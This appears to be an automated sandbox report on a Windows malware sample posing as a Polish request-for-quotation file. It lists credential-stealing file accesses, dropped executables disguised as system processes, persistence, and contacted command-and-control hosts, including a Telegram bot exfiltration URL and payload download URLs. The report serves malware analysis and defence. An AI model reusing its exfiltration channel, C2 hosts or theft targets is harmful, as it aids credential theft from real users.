                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,1_2_00436431
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe " Jump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00445DD3
                    Source: explorer.exe, 00000004.00000003.2556013660.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448655083.0000000000709000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192268321.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe Binary or memory string: Shell_TrayWnd
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000000.2020442400.0000000000482000.00000002.00000001.01000000.00000006.sdmp, zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00410D10 cpuid 1_2_00410D10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_004223BC
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeCode function: 0_2_0041E9D0 __vbaChkstk,__vbaOnError,#525,__vbaStrMove,__vbaLenBstr,__vbaStrToAnsi,GetUserNameA,__vbaStrToUnicode,__vbaFreeStr,#537,__vbaStrMove,__vbaInStr,#616,__vbaStrMove,__vbaFreeStr,__vbaFreeStr,__vbaErrorOverflow,0_2_0041E9D0
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_0040E470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: zapytanie ofertowe st-2024-s315 cpa9170385.exe PID: 1088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5568, type: MEMORYSTR
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.4486046867.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: zapytanie ofertowe st-2024-s315 cpa9170385.exe PID: 1088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5568, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe .0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe Binary or memory string: WIN_XP
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe Binary or memory string: WIN_XPe
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe Binary or memory string: WIN_VISTA
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe Binary or memory string: WIN_7
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: zapytanie ofertowe st-2024-s315 cpa9170385.exe PID: 1088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5568, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0000000A.00000002.4486046867.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: zapytanie ofertowe st-2024-s315 cpa9170385.exe PID: 1088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5568, type: MEMORYSTR
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.4486046867.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: zapytanie ofertowe st-2024-s315 cpa9170385.exe PID: 1088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5568, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_004741BB
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,1_2_0046483C
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,1_2_0047AD92
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts
                    1
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    2
                    Valid Accounts
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    131
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    4
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Service Execution
                    11
                    Windows Service
                    2
                    Valid Accounts
                    3
                    Obfuscated Files or Information
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    11
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Scheduled Task/Job
                    21
                    Access Token Manipulation
                    1
                    Software Packing
                    NTDS127
                    System Information Discovery
                    Distributed Component Object Model131
                    Input Capture
                    1
                    Non-Standard Port
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd11
                    Registry Run Keys / Startup Folder
                    11
                    Windows Service
                    1
                    DLL Side-Loading
                    LSA Secrets221
                    Security Software Discovery
                    SSH3
                    Clipboard Data
                    3
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                    Process Injection
                    1
                    File Deletion
                    Cached Domain Credentials21
                    Virtualization/Sandbox Evasion
                    VNCGUI Input Capture24
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                    Scheduled Task/Job
                    231
                    Masquerading
                    DCSync3
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job11
                    Registry Run Keys / Startup Folder
                    2
                    Valid Accounts
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Virtualization/Sandbox Evasion
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                    Access Token Manipulation
                    Network Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                    Process Injection
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544451 Sample: ZAPYTANIE OFERTOWE ST-2024-... Startdate: 29/10/2024 Architecture: WINDOWS Score: 100 76 reallyfreegeoip.org 2->76 78 api.telegram.org 2->78 80 11 other IPs or domains 2->80 102 Found malware configuration 2->102 104 Malicious sample detected (through community Yara rule) 2->104 106 Antivirus detection for dropped file 2->106 112 15 other signatures 2->112 12 ZAPYTANIE OFERTOWE ST-2024-S315  CPA9170385.exe 1 4 2->12         started        16 explorer.exe 2->16         started        signatures3 108 Tries to detect the country of the analysis system (by using the IP) 76->108 110 Uses the Telegram API (likely for C&C communication) 78->110 process4 file5 72 zapytanie ofertowe...315  cpa9170385.exe, PE32 12->72 dropped 74 C:\Users\user\AppData\Local\icsys.icn.exe, PE32 12->74 dropped 148 Installs a global keyboard hook 12->148 18 icsys.icn.exe 4 12->18         started        22 zapytanie ofertowe st-2024-s315  cpa9170385.exe 1 12->22         started        24 conhost.exe 12->24         started        signatures6 process7 file8 64 C:\Windows\System\explorer.exe, PE32 18->64 dropped 114 Antivirus detection for dropped file 18->114 116 Machine Learning detection for dropped file 18->116 118 Drops executables to the windows directory (C:\Windows) and starts them 18->118 124 2 other signatures 18->124 26 explorer.exe 3 72 18->26         started        120 Writes to foreign memory regions 22->120 122 Maps a DLL or memory area into another process 22->122 31 RegSvcs.exe 22->31         started        signatures9 process10 dnsIp11 82 vccmd01.zxq.net 51.81.194.202, 443, 49716, 49719 OVHFR United States 26->82 84 108.177.15.82, 49707, 49734, 49801 GOOGLEUS United States 26->84 90 3 other IPs or domains 26->90 68 C:\Windows\System\spoolsv.exe, PE32 26->68 dropped 70 C:\Users\user\AppData\Roaming\mrsys.exe, PE32 26->70 dropped 136 Antivirus detection for dropped file 26->136 138 System process connects to network (likely due to code injection or exploit) 26->138 140 Creates an undocumented autostart registry key 26->140 146 3 other signatures 26->146 33 spoolsv.exe 3 26->33         started        86 api.telegram.org 149.154.167.220, 443, 49733 TELEGRAMRU United Kingdom 31->86 88 mail.tlakovec.si 212.44.112.138, 49778, 49809, 587 DHH-ASSI Slovenia 31->88 92 3 other IPs or domains 31->92 142 Tries to steal Mail credentials (via file / registry access) 31->142 144 Tries to harvest and steal browser information (history, passwords, etc) 31->144 file12 signatures13 process14 file15 62 C:\Windows\System\svchost.exe, PE32 33->62 dropped 94 Antivirus detection for dropped file 33->94 96 Machine Learning detection for dropped file 33->96 98 Drops executables to the windows directory (C:\Windows) and starts them 33->98 100 2 other signatures 33->100 37 svchost.exe 229 4 33->37         started        signatures16 process17 file18 66 C:\Users\user\AppData\Local\stsys.exe, PE32 37->66 dropped 126 Antivirus detection for dropped file 37->126 128 Detected CryptOne packer 37->128 130 Creates an undocumented autostart registry key 37->130 132 4 other signatures 37->132 41 spoolsv.exe 37->41         started        44 at.exe 37->44         started        46 at.exe 37->46         started        48 27 other processes 37->48 signatures19 process20 signatures21 134 Installs a global keyboard hook 41->134 50 conhost.exe 44->50         started        52 conhost.exe 46->52         started        54 conhost.exe 48->54         started        56 conhost.exe 48->56         started        58 conhost.exe 48->58         started        60 23 other processes 48->60 process22

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe100%AviraTR/Patched.Ren.Gen
                    ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\icsys.icn.exe100%AviraTR/Patched.Ren.Gen
                    C:\Windows\System\svchost.exe100%AviraTR/Patched.Ren.Gen
                    C:\Users\user\AppData\Local\stsys.exe100%AviraTR/Patched.Ren.Gen
                    C:\Windows\System\spoolsv.exe100%AviraTR/Patched.Ren.Gen
                    C:\Users\user\AppData\Roaming\mrsys.exe100%AviraTR/Patched.Ren.Gen
                    C:\Windows\System\explorer.exe100%AviraTR/Patched.Ren.Gen
                    C:\Users\user\AppData\Local\icsys.icn.exe100%Joe Sandbox ML
                    C:\Windows\System\svchost.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\stsys.exe100%Joe Sandbox ML
                    C:\Windows\System\spoolsv.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\mrsys.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe 100%Joe Sandbox ML
                    C:\Windows\System\explorer.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://schema.org0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    https://yoast.com/wordpress/plugins/seo/0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    188.114.96.3
                    truetrue
                      unknown
                      mail.tlakovec.si
                      212.44.112.138
                      truetrue
                        unknown
                        api.telegram.org
                        149.154.167.220
                        truetrue
                          unknown
                          zxq.net
                          51.81.194.202
                          truetrue
                            unknown
                            googlecode.l.googleusercontent.com
                            64.233.166.82
                            truefalse
                              unknown
                              checkip.dyndns.com
                              132.226.247.73
                              truefalse
                                unknown
                                vccmd01.zxq.net
                                51.81.194.202
                                truetrue
                                  unknown
                                  241.42.69.40.in-addr.arpa
                                  unknown
                                  unknowntrue
                                    unknown
                                    vccmd03.googlecode.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      vccmd01.t35.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        vccmd01.googlecode.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          checkip.dyndns.org
                                          unknown
                                          unknowntrue
                                            unknown
                                            vccmd02.googlecode.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              http://vccmd03.googlecode.com/files/cmsys.giffalse
                                                unknown
                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2029/10/2024%20/%2023:58:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                                  unknown
                                                  http://checkip.dyndns.org/false
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://zxq.net/cmsys.giftrue
                                                    unknown
                                                    https://zxq.net/what-happened-to-the-old-zxq-website/true
                                                      unknown
                                                      https://reallyfreegeoip.org/xml/173.254.250.72false
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabRegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://zxq.net/wp-content/uploads/2022/02/ZXQ-FB.pngcmsys.cmn.4.drfalse
                                                          unknown
                                                          https://duckduckgo.com/ac/?q=RegSvcs.exe, 0000000A.00000002.4489526374.0000000003D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://zxq.net/privacy-policy/cmsys.cmn.4.drfalse
                                                            unknown
                                                            https://zxq.net/what-happened-to-the-old-zxq-website/m32explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://api.telegram.org/botzapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://zxq.net/cmsys.gifnexplorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
